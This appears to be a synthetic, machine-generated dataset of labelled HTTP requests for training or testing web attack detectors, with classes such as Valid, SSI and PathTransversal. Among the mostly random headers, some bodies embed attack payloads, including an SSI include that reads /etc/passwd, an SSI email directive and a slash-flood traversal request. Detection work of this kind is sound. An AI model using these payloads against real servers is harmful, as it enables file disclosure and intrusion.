Upgrade: Cdr/9.5, gton/2.2
Warning: 364 www.rnndhhu.html "lNiB7of9mccT8t4" 
X-Forwarded-For: 192.179.67.70
X-Serial-Number: 572256
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12117
Start - Id: 33655
class: Valid
POST /kI/cesenxlagtf7ealt1/gSqPuvwDjc.sgFXn/h9m/rMwq/cseeais/evlnttghnhare8di.aspx? HTTP/1.1
Content-Length: 254
Content-Language: tdsf,1e2aeu,ei
Content-Encoding: gzip
Content-Location: /nyahs/aleebn/ui7g/3ehdco.php
Content-MD5: c25hbzVhaUZpdG4xYW52bg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 17 Apr 04 09:27:27 CET
Last-Modified: Sun, 20 Jan 08 07:45:21 UTC
Host: 207.243.220.5
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: x-mac-chinesetrad, gb2312;q=0.4, iso-8859-2, x-mac-japanese
Accept-Encoding: *
Accept-Language: z8sx1o-7oovn, Cans-pl
Cache-Control: min-fresh=6
Client-ip: 113.146.215.236
Cookie: QGZYDfUGv=+htChaving6m-eo;Sucat=6
Cookie2: $Version="136"
Date: Mon, 24 Aug 09 12:13:22 GMT
ETag: "uDkvoVUULN0XGOr"
Expect: otyitnw=Sco0tmho;oa7ao=3t0saawY
From: diro@y1e50IxI.com
If-Modified-Since: Sun, 14 May 06 16:47:43 GMT
If-Unmodified-Since: Tue, 19 Oct 04 08:13:42 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 14 Mar 05 13:48:35 CET
Max-Forwards: 44
MIME-Version: 2.6
Pragma: teye='eh'
Proxy-Authorization: ecrhet tsDhit=aneesaei
Authorization: NTLM N25zcmQyMW81bG5nMHllY2hlaW5idG5lcnJvZWR3Tm9qZmVvb3pzc3VvSXM=
Range: 97019-,-6
Referer: http://alnee.com/oNant/svOai/eo6o/nnhoe/ye2mp.jpg
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/4.5 (compatible; Konqueror/2.4; Unix; cao8eil; s8s9dbte)
UA-CPU: PowerPC
UA-Disp: 0976,3445,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 3257x6651
Via: 6.3 248.57.37.101:6152, HTTP/0.5 www.glfe.jpg
Transfer-Encoding: identity
Upgrade: ihLGi/8.8, n6tsu6/2.8
Warning: 207 108.67.175.165 "2eeoi" "Sun, 02 Sep 07 12:24:19 GMT"
X-Forwarded-For: 246.11.40.158
X-Serial-Number: 6339975961282
----: ------------
~~~~~: ~~~~~~~~~~

Retpub7olk6n8=pcnullugpositionaidr p'a&oszorfhh6laSl=57890234&ee3zehuzl=28988044&mS6topn=fi9n1haih&mai6Hue7=(rrrpH<sy  tEa ;N4j=&WiSlrsn=vopeh&jRq6cftp.isaw=d<&raemon9=orqermCMdeaad&aw=~ei&la=hevo&BXxincludel@ifUI=imgn/S&eaiim6eAd3s6reo=d

End - Id: 33655
Start - Id: 6267
class: Valid
POST /o9V6ttorotcd5lat/DooDs.htm? HTTP/1.1
Content-Length: 253
Content-Language: edai
Content-Encoding: identity
Content-Location: /omvueao/dEdean/flxysg/4ht7/e2yea.php4
Content-MD5: emN0a3Rib2VoaVNiM2FtNQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 13 Jan 05 08:09:10 UTC
Last-Modified: Sat, 24 Apr 04 07:25:36 GMT
Host: www.trd4oo.ch
Connection: dl8ng
Accept: */*;q=0.4
Accept-Charset: *;q=0.6
Accept-Encoding: identity;q=0.2, identity, gzip, deflate, identity
Accept-Language: *;q=0.5
Cache-Control: max-age=28185
Client-ip: 52.150.6.189
Cookie: ai7sojdgcaacrr=8481;hE6=n84
Cookie2: $Version="947"
Date: Sun, 03 May 09 09:33:19 GMT
ETag: W/"Tk5zrrAfhUQaQqYj"
Expect: yiItm=iirn;kdlktt=d2v4r
From: yder@cto6.com
If-Modified-Since: Fri, 19 Aug 05 02:26:02 GMT
If-Unmodified-Since: Fri, 26 Jun 09 20:25:37 GMT
If-Match: "h6HLriJV7yayaf-"
If-None-Match: "ncJhGZScoehqOqKxC"
If-Range: *
Max-Forwards: 6534
MIME-Version: 1.5
Pragma: y='otWta'
Proxy-Authorization: Digest uri=http://www.zela.st/1WrnB/mtdtwe/iaqnyt/yrof/oSta1uHi.pdf
Authorization: Basic ZUZQaWhrOjROeUFpbEg=
Range: 31074-7605
Referer: http://www.nsdrsag.net/NNtlwqoe/ebitery/omwH/eettt.mpeg
TE: chunked;q=0.2
Trailer: Proxy-Authorization
User-Agent: aoneiiale (fBiQ34KM-H; iDpESGXMq; tJmBbuT1I1)
UA-CPU: 68000
UA-Disp: 9466,026,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6564x871
Via: hyf/5.5 117.103.195.200
Transfer-Encoding: gzip
Upgrade: ra0Hnd/6.8, eyae/3.6, Irhtn/4.9, eltrm/8.5, ilhi/1.9
Warning: 097 84.156.203.77 "rilteriyvagst2t" 
X-Forwarded-For: 128.144.152.215
X-Serial-Number: 9542646613445
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

SnAPYA1q.=t yasiynHH& p1deletei&uLUfiteoshH=r &aertp=hedts2il&ewti=tyMMo@BGc&Ltbdentn=utpositiontserRn$select&svzxwiTrhxtdqd=654&rtzqTw4t1cT=ifhM9_&XwcmdO=osh&0ax34wLqht=uatusilyIhuOndo&3lgo=kEae&aise6Eae-&l9vrrorfsl6h=67035&tlTc=otao&km@1R=mafh

End - Id: 6267
Start - Id: 16654
class: Valid
GET /eT34WZX/Gbetween/ypaot9ifjenehXA5/2nseiiaiE6nara2aeo/qNitpeiucsa/hh.php?sm3naqu=eic8%3Bq1lj&tse3b1=bL2qunijCS HTTP/1.1
Host: www.fheTeI6n.it
Connection: cetDtSb3
Accept: text/plain;q=0.3, text/*, application/x-tar;q=0.9
Accept-Charset: euc-cn;q=0.0, windows-1257, cp-936
Accept-Encoding: gzip;q=0.0, identity;q=0.6
Accept-Language: gdwt9-yo44;q=0.1, hiwm-d;q=0.8, PhiuAt5-Re4Btee, nts-ss;q=0.0
Cache-Control: no-transform
Client-ip: 150.122.14.63
Cookie: xuoage8=Qxaengersd4dt;oraibonb=es-evsscy;sstyleXX=anls;eoohEin=c a;rgw=eeaii4sinaaekc04y;osnroetdr=tE8gahro4dq
Cookie2: $Version="13"
Date: Sat, 13 May 06 03:21:50 UTC
ETag: W/"H6TEpx9jHT7U1nb8jS26"
Expect: 100-continue
From: 7beimH@indn.it
If-Modified-Since: Sun, 17 Sep 06 06:54:53 CET
If-Unmodified-Since: Thu, 06 Mar 08 04:38:13 CET
If-Match: *
If-None-Match: "gP7HElrwBsLM.Ho"
If-Range: Sat, 29 Sep 07 06:46:47 CET
Max-Forwards: 42
MIME-Version: 3.7
Pragma: cgrt='wbeOr9er'
Proxy-Authorization: NTLM dWV1ZXNpcmFzYmxsYjN0dnR6d21SdXRsZHRpaWV0bGFobGF1Z29x
Authorization: hmsefL a2irb=ahntosr
Range: -085,-96748
Referer: /thetEF/bnemxa.mp3
TE: chunked;q=0.6
Trailer: Warning
User-Agent: tdouxIur2y
UA-CPU: x86
UA-Disp: 950,9201,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5729x0287
Via: rLr/2.0 www.oa1r.tiff, 3.2 90.214.82.181:3
Transfer-Encoding: identity
Upgrade: ombmMg/6.7
Warning: 890 www.nUiou.jpeg "oe52aLer" 
X-Forwarded-For: 241.107.33.0
X-Serial-Number: 6793102
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16654
Start - Id: 39557
class: SSI
PUT /hHgf18fqHw0NYPacMa0i/l7LVNw.AqGLVVlLqScQ/bin1LhhgIXcatO/apwSvDFecnFkI3I/sTdAwpL4Ngcw57F/-F5h.nsf? HTTP/1.1
Content-Length: 225
Content-Language: hfa
Content-Encoding: compress
Content-Location: http://www.oa0zhues.cz/teaem0/eeNasuH/aoe89nh.mdb
Content-MD5: bnIxbmxpdEhPZWxodHJzbA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 06 Apr 07 22:28:33 GMT
Last-Modified: Thu, 13 May 04 02:42:58 CET
Host: www.erdnue3e.ch
Connection: eenlhie
Accept: application/*, application/*
Accept-Charset: euc-tw;q=0.0, windows-1255, windows-1257;q=0.8, iso-8859-5, ks_c_5601-1987;q=0.5
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: max-stale=97868
Client-ip: 147.32.196.230
Cookie: diaiicCooboa=1HlT9P;ld=sN.;outr7rAa=9NstrLnn;ftt8ietaitOn=60;Ooos8=7Btmntreao;ec=CiEgerwithi
Cookie2: $Version="99"
Date: Mon, 03 Mar 08 22:18:47 CET
ETag: ".ZpMfbiUz3x2gzQ"
Expect: nmfso8Ea
From: zdt1Ooe@cVtsgan.ch
If-Modified-Since: Tue, 01 Jul 08 03:03:35 GMT
If-Unmodified-Since: Sun, 10 Jul 05 16:59:49 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: NTLM ZjJzNWlueDhhY29hdHBvZ2VvZWZwcmlyb2ljdDdidm55YXR5eTJpRWV4YWpTZXA=
Authorization: NTLM THR0d2RlZWlscW5yYXRodDF0MGRpd3hhaXN0ZmhzUHN0ZGo1b3dhaG5hc2k=
Range: -29400,128-60803
Referer: http://oelme.fr/DLlw/odtn/Anbc/a3ee9e.jpg
TE: trailers,gzip;q=0.3,deflate;q=0.5
Trailer: Accept-Charset
User-Agent: aF@MusTn3C http://www.fSiles.biz
UA-Disp: 9090,6972,8
UA-OS: Windows 95
UA-Color: color8
Via: 9.2 101.249.175.32, 0.8 www.ruOivEa.css
Transfer-Encoding: gzip
Upgrade: ibhi3u/4.0, tAAin/1.9, ofae/4.1, dojnr/5.2
Warning: 138 www.mUgeeihd.jpeg "rr0mHnay7tiSwEpan" "Thu, 22 Mar 07 10:16:04 GMT"
X-Serial-Number: 11507528452920010282
----: -------------------------
~~~~~: ~~~~~~~~~~~

vmaciri7la=rcpsqmeidor&whAhtos2rme=D/n2sl2nethrnht&rsPumot5hgsc=36312757&dtarnteTeR=orSn<enne7yiio5r&ogmrzcdnsmxD7=<!--#include    virtual="/etc/passwd"   -->&mh7aexedmfehm=ssnda]&mohdtfps1evaf=zdmosF1

End - Id: 39557
Start - Id: 21625
class: Valid
GET /mchildyxrcpaG1/stCtMjes/sG6Y-ypBV_f9/hiitnweagn5A/ee/pp/g1tI/72oout/t0sKzC7SduLM/boot.ini2O0UtVRh86X0S/mmeA8hd32eiahaeA7E.png?bdl5Se4si=rZZONX&sigam8lpd=ounp&yhtynnneLok8eq=a&A-sBJKV=ewinnt&baGvbscriptzYfBBxM2=frometcnltLgr+r&3sirt0=sriservicesmreAmzGl&wJtIoJNVb=lB-E-1hR9H HTTP/1.1
Host: www.eaf0bN.be
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 160.240.96.171
Cookie: 3u5lixdRsmE3o=oHseeeo;ikisdrnh5oc=nrcp%apb'
Cookie2: $Version="43"
Date: Tue, 30 Jun 09 21:43:56 GMT
ETag: "7ly7eaghEhD_adE97d"
Expect: 100-continue
From: tobWrwtn@esCei1hec.st
If-Modified-Since: Sat, 19 Mar 05 06:47:43 CET
If-Unmodified-Since: Sun, 26 Nov 06 12:59:42 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 19 Apr 08 06:16:05 GMT
Max-Forwards: 0
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: iene iujpu5o=8e5behlo
Authorization: percek tmt6ono=eltjn
Range: -924,18744-98395
Referer: http://www.stfptBt.fr/wrdcaes/m75nycl/i9uua.cfm
TE: chunked
Trailer: If-Unmodified-Since
User-Agent: krc1f0 http://www.ymset8.net
UA-CPU: x86
UA-Disp: 198,1596,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 767x833
Via: 4.9 202.199.165.191
Transfer-Encoding: in2Fk; epfancel=0hec
Upgrade: codse/2.4, Orte/3.9, dttr/7.6, cTjdn/1.0, iaatOs/2.1
Warning: 454 253.133.69.76 "ooerIseMeAi7r9coias" "Sat, 14 Oct 06 08:48:24 UTC"
X-Forwarded-For: 102.122.239.98
X-Serial-Number: 4331077002
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21625
Start - Id: 28177
class: Valid
GET /ktyatgnr3nnLeAt/btsPuse2alCsD/iget/ut/oTtmuRUDR2Y4d.cHwF/BD/aAerbvsbsaer/nb17sa9tcm.exe?ieetlt=rnmoaotyr&7t=obsasKaeu&omdnow4iie=191826&toqe=t+9iz&oyirhtsw5=smdewsensbb&oe=2780&elrYe5=ocs6dteaxt08e&ix2=fi&etkAawe3d6dcf=ritse7copyahwaq8php2&oE3hiiau=objects HTTP/1.1
Host: www.tgbg4iEX.de
Connection: 3Sssek
Accept: image/*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 221.141.132.92
Cookie: pef6tuhy=43;arandn=bMO0N
Cookie2: $Version="476"
Date: Mon, 22 Jun 09 17:12:23 CET
ETag: "JPzvAVdt4Fdgny72bU"
Expect: cmGhof4A=ehaaa;godae
From: ncrto@gtaaei.be
If-Modified-Since: Sat, 07 May 05 01:00:34 GMT
If-Unmodified-Since: Sun, 25 May 08 17:37:54 UTC
If-Match: "spiScX3lMUwZEuQSOY"
If-None-Match: *
If-Range: "JmH_o0bescFm-Pz2U"
Max-Forwards: 76
MIME-Version: 1.1
Pragma: lmCeIa=ceoejel
Proxy-Authorization: Digest realm
Authorization: s84l xrth=gvcecq
Range: 41-7,-70107,-4601
Referer: /6ilt/oitg/hTaaas.gif
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.1 (X11; U; Linux i586 9.7; ot-sa; rv:9.2.2) Gecko/24234387
UA-CPU: Sparc
UA-Disp: 3034,654,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 709x9320
Via: 5.3 60.82.133.191, Taeogh/0.0 www.mag4usa.png
Transfer-Encoding: deflate
Upgrade: iers3/6.1
Warning: 941 204.125.32.112 "Rsze" 
X-Forwarded-For: 134.70.220.154
X-Serial-Number: 738445299
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28177
Start - Id: 3177
class: Valid
GET /sIxyOgfTD/gP2QwmnWQqA2QIXdlk/wKVQJkUsnh5l/Vqisxmjheis/ixp_q_fxP@q3z/y8kyReg4/h3m/sxEeKRvyK.php?ohemNpfterr1bt=h&ogoedxAOTg73=fid&yaerieraeceM=9131089916&qaseigsia8Nboq=642640035&ir=666689&iodbibpEdrvfJ=oKK_QtCnyguc HTTP/1.0
Host: 86.0.216.250
Connection: keep-alive
Accept: image/*;q=0.4, text/*, text/*
Accept-Charset: *;q=0.1
Accept-Encoding: identity
Accept-Language: eeeu-ys, 9frjhe-diztt;q=0.3, rlren-cpudgenc;q=0.9
Cache-Control: only-if-cached
Client-ip: 56.73.81.114
Cookie: -hp_9l=LtiframeR;1ibM=oN2s@_ngKJqg
Cookie2: $Version="9"
Date: Wed, 14 Oct 09 06:21:00 UTC
ETag: "wpYO@bsApGndQi5@"
Expect: 100-continue
From: esjrw@sdiElnyr.fr
If-Modified-Since: Sun, 01 Nov 09 15:46:51 CET
If-Unmodified-Since: Mon, 27 Feb 06 24:00:05 GMT
If-Match: *
If-None-Match: "wJbZdiHliZZ-7MeSh1"
If-Range: Sun, 07 Jan 07 03:41:11 GMT
Max-Forwards: 2
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Basic OHRyZTpUZWttd3N0ZQ==
Authorization: nLits iim4eN=b6nt
Range: -47302,-8,36738-
Referer: http://www.ttde.com/gYheatzg/u7ilw/oetu.pl
TE: deflate,trailers,trailers
Trailer: If-Match
User-Agent: eOhEtcst
UA-CPU: PowerPC
UA-Disp: 6094,118,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0773x113
Via: 8.9 58.221.77.202, oUo/9.7 www.l7ywiwto.htm, 3.9 78.111.171.233
Transfer-Encoding: identity
Upgrade: uRh8ia/4.7
Warning: 520 59.225.217.165:5331 "eos2vb" "Sun, 09 Mar 08 14:23:53 UTC"
X-Forwarded-For: 37.92.1.154
X-Serial-Number: 37153368506514
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3177
Start - Id: 12623
class: Valid
GET /ocena/awsaraoh/Tee/injtetmrfmtt3tdbteha/cN/lQw/B1aFFn4T0x7/IsL4RqX/ocVvnNF5b@sF.IudEP/eO8ii_/eIzivKpgK.jpeg?iit9=tZBu&wid=l9oe&iPk3muc=953349&.uJK=duepiwindow.opene%7E&tnyeyr4bNlra=6187&V8O_fwtSk.-I=qLhs%28lootsqiXrsk%2Fn&nnHrlulselcoB=sa&whereG55BcmdGrPqop=34310&9rT7e3baaseWnno=177436&eslrgwelnnr3tre=jfdqtElnacotat&fdmksdgl6athIx=dxafr&hnw8mwdtttIin=5PsJP67&fboSidhfeosaer=ohhoeenrfsf HTTP/1.1
Host: www.icjeevs2rg.uk:041
Connection: close
Accept: audio/*
Accept-Charset: shift_jis;q=0.5
Accept-Encoding: compress, gzip;q=0.9
Accept-Language: *;q=0.8
Cache-Control: min-fresh=2953
Client-ip: 225.71.167.9
Cookie: aLesont=~9teU6T2ai|Tli;babeweg2ch=7959235835;e5sm=oiae;ofh3sRgeg=891917804;toulgoopg84gsn=5165198;hnryQbowdixhqgi=uIvaraer
Cookie2: $Version="78"
Date: Sat, 20 Mar 04 16:16:24 CET
ETag: "lC0mVi3vuwsnqgx"
Expect: hne86=esitsp3
From: e9hfirse@Sgst2t.uk
If-Modified-Since: Mon, 29 Nov 04 08:56:12 CET
If-Unmodified-Since: Thu, 03 Jun 04 13:59:20 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 68
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: Tpst y8ci=Ra7si5G
Authorization: nIauos 57bft=reatt
Range: 876-,6-,682-
Referer: /naEcOaWi/vinjusb/ynrf7a.tiff
TE: trailers,gzip;q=0.4
Trailer: If-Match
User-Agent: Mozilla/0.5 (X11; U; Open BSD i586 0.6; uk-ie; rv:5.4.9) Gecko/17563042
UA-CPU: x86
UA-Disp: 3446,218,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 280x609
Via: 2.1 71.133.17.161:85698, aeFh/9.8 www.ltiu.jpg
Transfer-Encoding: of7e; ttdi=IhYmt
Upgrade: ecc/3.0, uoz/4.6, asr/7.3, iyUor/1.5, ouaiR/5.0
Warning: 296 www.3nsUcnrd.png "not8taFAgawwrmldia" "Thu, 31 Jul 08 14:24:39 UTC"
X-Forwarded-For: 75.184.77.165
X-Serial-Number: 5299334202326422361
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12623
Start - Id: 39205
class: SSI
PUT /nnApVthh64e9/ewbX4iIGSPcX3E/TU9gE0/edoIsn/cRttnpfetons/apdB/btot/psuncic9/DeenyTdfegtg/tblocation38trtimglBIJY/rmr.jpeg? HTTP/1.1
Content-Length: 422
Content-Language: tim,a3lii,i3citrLt
Content-Encoding: gzip
Content-Location: http://tlRoat.cz/psat/ihootttr/snfNow/csPnof2t/aunmz.tar
Content-MD5: Z2VzbXJxY2xldGVrZHBlaw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 24 Feb 07 11:50:07 UTC
Last-Modified: Tue, 03 Apr 07 13:41:06 UTC
Host: www.a4irgBe7nc.org
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 79.240.86.120
Cookie: at8UeamI=n%;tHrEdtofmnhsxnh=as;mdeunlts=8011793;Dj2Tt=9600849
Cookie2: $Version="690"
Date: Sat, 18 Jul 09 01:01:12 GMT
ETag: W/"_bPK-Nwbl2.qlgL"
Expect: 100-continue
From: egngmnl@let9lo.net
If-Modified-Since: Sat, 05 Nov 05 01:52:11 UTC
If-Unmodified-Since: Tue, 16 Jun 09 08:59:00 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 136
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: dlel tipu=gsey
Authorization: Digest algorithm=gednec
Range: -6444
Referer: http://ioce.uk/fwe5ejri/jvavei/l1rrwa/ls8a/so48pnee.js
TE: chunked,trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.0 (Windows; U; Windows NT 9.8; st-a3; rv:8.0.3) Gecko/28290779
UA-Disp: 375,7789,32
UA-Color: color16
UA-Pixels: 466x9263
Via: 3.0 www.ueiNo.tiff
Transfer-Encoding: gzip
Upgrade: Dhol4t/4.0
Warning: 080 161.106.107.38 "ptynoda1w" "Wed, 05 Oct 05 18:34:52 GMT"
X-Forwarded-For: 10.24.21.76
X-Serial-Number: 4765226560917916
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aa.OD=00&plNFhLoM=?oelog1hepassthruswel xls&Eccfa=$69odopena i&ffAekeida=o ;&artepoE=<!--#email fromhost="www.roywtmel.com" tohost="mailbox.wagl.com" message="Zero7r saam5D abn0eayr doVR" fromaddress="e4ueo.com" toaddress="8nto.nneiqe.com" subject="yer" sender="wlE.com" replyto="ieaARg.com" cc="br" inreplyto="5tne tseB bip" id="7e5mail" -->

End - Id: 39205
Start - Id: 45218
class: PathTransversal
GET ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////? HTTP/1.1
Host: www.3bocoztrth.de
Connection: close
Accept: video/*;q=0.2, application/*, text/*
Accept-Charset: euc-tw;q=0.3
Accept-Encoding: *;q=0.2
Accept-Language: sWgatea-m0;q=0.0, 6o-sti;q=0.2, onahp-3xao, oaiani-tHn;q=0.4, hhee-ovh4dgir
Cache-Control: only-if-cached
Client-ip: 22.54.242.219
Cookie: 5aameT=qsE1w&d'setn;ndcaahs=8878;xltmbEranou3=fi
Cookie2: $Version="174"
Date: Tue, 06 May 08 18:13:03 CET
ETag: "Fye-r9dja0fSKIbx"
Expect: okyem
From: 1p4rry@estl2a.org
If-Modified-Since: Tue, 21 Feb 06 05:39:31 UTC
If-Unmodified-Since: Sat, 29 Nov 08 14:37:13 UTC
If-Match: "8NKHrVu-PltzuDw"
If-None-Match: "DGu6J8oAgQ73WlXb_C"
If-Range: Fri, 07 Sep 07 22:02:20 CET
Max-Forwards: 6420
MIME-Version: 3.6
Pragma: lx='enaSr'
Proxy-Authorization: Digest qop=evai40
Authorization: NTLM MXBhbmt5bmFPbm9RaWFyZ2VlYm9uanVndHRhZWlhc2VhYQ==
Range: -01750,762-,10389-0
Referer: http://shdl.st/hiramhko/l3aesh9a/30ide.rar
TE: trailers,gzip
Trailer: Expect
User-Agent: rs7je8ayrbsnenenfox7
UA-CPU: 68000
UA-Disp: 675,5988,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2272x045
Via: HTTP/1.6 8.6.60.247, HTTP/3.4 www.iNqw.tiff, 6.3 69.89.74.242
Transfer-Encoding: lconiN
Upgrade: botOA/6.4, hiei4a/3.6, u8Qat/8.0
Warning: 342 www.bgya.css "oc3o7d" 
X-Forwarded-For: 50.104.249.90
X-Serial-Number: 706890452941318
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45218
Start - Id: 12517
class: Valid
GET /aAIp1s1altrT0w6Bcl/htGE5/y85V/seo/z1@2Nk_DrIk24/kbN/on.tiff?fait=dRAqqv1fP&elxSe5ibehmtin=c+nss&tghowxRtwez=3929&nhntr6fudKabdi=9787&seop=65&uuep=q2.&nlsaehnhretpnhe=39&tltvWnmOuuqb=49898 HTTP/1.1
Host: 232.64.79.189:80
Connection: close
Accept: text/xml
Accept-Charset: *;q=0.1
Accept-Encoding: gzip;q=0.5, identity
Accept-Language: eemtaz-f;q=0.6
Cache-Control: only-if-cached
Client-ip: 132.173.244.118
Cookie: ilq=mfN;thSta=t3h5Wg;iptaalenelwnAdt=a-mIVa_Sj;ei6amieamc=s+4
Cookie2: $Version="9"
Date: Mon, 16 Feb 04 01:27:28 CET
ETag: W/"GB0yHjmBx9u.vEVCifDl"
Expect: 100-continue
From: deAe@iiia.st
If-Modified-Since: Thu, 13 Sep 07 11:57:44 CET
If-Unmodified-Since: Thu, 04 Dec 08 17:31:17 GMT
If-Match: "F-m_dZWZolid0nx7.n"
If-None-Match: "h2Hw6QeWEgUFqA3WjpN"
If-Range: *
Max-Forwards: 2
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Digest qop=tlainatN
Authorization: Basic aXRvMThkOmFtdUU=
Range: 9895-033107
Referer: http://www.atecuoqE.com/amw0rots/qeqhorsn/rlmo.mdb
TE: trailers,trailers
Trailer: Connection
User-Agent: jZBCse http://www.unove4no.ch
UA-CPU: Sparc
UA-Disp: 3658,3398,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 580x349
Via: 0.0 199.16.49.165
Transfer-Encoding: af6ntt
Upgrade: AGSes/3.1
Warning: 308 212.140.37.183 "tnstnwlHnrwl" 
X-Forwarded-For: 44.18.78.71
X-Serial-Number: 2197491883894
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12517
Start - Id: 19666
class: Valid
GET /l18Pf/eSILmv8yz.htm? HTTP/1.1
Host: www.doet.net
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.7
Accept-Encoding: identity, identity, deflate, compress;q=0.2, deflate
Accept-Language: sNrihv-Ashesew;q=0.0
Cache-Control: 4yalrusr='uot'
Client-ip: 16.151.119.100
Cookie: Nt4x=dRP;r4yeqskpolttj=attdf6nt7ti;ryfyn=da2e;ebaa=ark_;5kohxehS=&gchild;6ht8iehtr7dht=k2QzAm
Cookie2: $Version="73"
Date: Wed, 07 Dec 05 19:31:20 UTC
ETag: W/"-qsLuv-EiEwuhFBn4MD"
Expect: hWdKemS1=utbiuazm
From: ee7M@e2fmh.it
If-Modified-Since: Sun, 01 Aug 04 21:56:58 GMT
If-Unmodified-Since: Sat, 21 Jul 07 07:47:18 GMT
If-Match: "hRK034LO6gdaRPtJ53k"
If-None-Match: *
If-Range: *
Max-Forwards: 480
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: wncf sZiI=mapeesi
Authorization: Digest qop=1jrlm
Range: -616446,-952232,-327
Referer: /rela/4oqmhn/7yom/4sg8gsmo/6rATj1lu.php3
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/3.1 (Machintosh; U; PPC Mac OS X 5.8; gh-tt; rv:6.1.1) Gecko/46483453
UA-CPU: StrongARM
UA-Disp: 4810,493,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 106x833
Via: 4.5 www.ariip.htm, 3.7 www.aasua.css
Transfer-Encoding: lbeeW; 3eantaiA=hsal
Upgrade: oalaa/7.0, rhnhe/1.6, nkog/3.3
Warning: 267 www.iNuh.htm "4UnmLUdicatt2si" "Fri, 21 Jul 06 15:56:52 CET"
X-Forwarded-For: 152.55.56.249
X-Serial-Number: 7592797493312
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19666
Start - Id: 29552
class: Valid
GET /7O4K97KRhttp/h4I-UMm/t9/3AoI3Hh@StmpperlM9/iGK__kZ0F/boot.inixYYQ/djCRUA_L1xSkurm/js/iaY6II_7XA5NZivdY/Eotbrro.mdb?uyl=ni&hojs=tWvht1+nokaaA4+&ilHre3Zzsgdado=9134&cKsgqeeeeonntSt=tohmdtm&aahlh=+u%3C5&5foAish=rL1PUO&gsdegotzAdt=1rN1tEhdrrietioilq&8e3pootntttsyv=ngh%27%24e9 HTTP/1.0
Host: www.2CTcri1.biz:80
Connection: nuFtikei
Accept: video/quicktime;q=0.6, video/*;q=0.6, audio/x-wav
Accept-Charset: iso-8859-4, iso-8859-8, us-ascii, utf-8;q=0.1, euc-tw;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 102.82.97.165
Cookie: ad7tptr=ah7cm;8iwcEpeip8uThi=4711;iclShRxxbb0efUI=tD9Y9x;qiLfPAjj2winntwget@=535;san2=078361
Cookie2: $Version="7"
Date: Fri, 10 Apr 09 23:39:12 GMT
ETag: "e6j.ieGuWuJaBrxB9VF"
Expect: awianDu=fnketir;ruzioroe
From: rain@uiqt.com
If-Modified-Since: Thu, 18 Aug 05 06:25:48 CET
If-Unmodified-Since: Thu, 23 Jul 09 20:16:11 GMT
If-Match: *
If-None-Match: "pTNegx1RK6og6SPKy"
If-Range: Fri, 23 Apr 10 01:46:06 CET
Max-Forwards: 775
MIME-Version: 6.1
Pragma: oEFlxre=eytn
Proxy-Authorization: NTLM dHZ1YWRsbHI4ZWFzbGFzb21peTRuUG9uT2VvZGNkcmRwdEZlaDI5b0ViYWFpZDg=
Authorization: Digest response="da51B7fcD29a9fDfA2F7A1c8B0fdC2CB"
Range: 769081-,036-,28554-934721
Referer: http://www.teter.gov/Ostl/ekt8Pta/r9ct.conf
TE: trailers,deflate
Trailer: Upgrade
